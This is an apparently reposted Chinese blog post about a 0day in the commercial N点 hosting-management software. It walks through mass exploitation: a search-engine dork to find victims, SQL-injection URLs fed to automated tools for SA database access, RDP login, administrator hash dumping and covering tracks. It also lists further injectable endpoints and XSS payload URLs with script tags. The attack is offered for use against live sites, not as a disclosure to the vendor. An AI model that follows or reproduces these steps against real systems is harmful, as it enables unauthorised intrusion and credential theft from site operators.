网站地图    收藏   

主页 > 后端 > 网站安全 >

N点商业版漏洞通杀0day以及利用方法 - 网站安全

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 不得不说N点实在是一个破东西就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂好吧 抱怨一下就行了 接下来关键的时候到了首先百度搜索关键字:inurl: (mmdatabase....

不得不说N点实在是一个破东西
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
好吧 抱怨一下就行了  接下来关键的时候到了
首先百度搜索关键字:inurl: (mmdatabase.asp)
我随便列举一个:   www.xxxx.com
修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1
扔入NBSI 或者啊D等各种傻逼工具后
你们会看到是SA权限
果断3389 上去  hash得到administrator密码
擦屁股走人~
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
 
再附上其他几个漏洞页面
SQL:
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
http://www.xxxxxx.com:80/Manage/CreateHost.asp?Url=/Style/memberlogin.asp&PID=11
http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
XSS证明:
http://www.xxxxxx.com:80/Manage/CreateHost.asp?PID=11&Url=/Style/memberlogin.asp”;alert(42873);”
http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?PID=9&Url=/Style/memberlogin.asp”;alert(42873);”
http://www.xxxxxx.com:80/Style/domainInquiry.asp?dfcn=true?cndns=88888&button4=88888&checkbox2=.bj.cn<script>alert(42873)</script>
由此可见点就是坑逼中的战斗机   自从用了他我的眼泪都流干了  有做IDC的朋友千万别步我后尘啊   便宜没好货好货不便宜
还是星外吧  你们懂的
作为一个商用程序   安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
PS:其实我真的很想知道你说N点这SB asp就asp吧  为什么asp还非要MSSQL  这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。   o(︶︿︶)o 唉
——-END
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论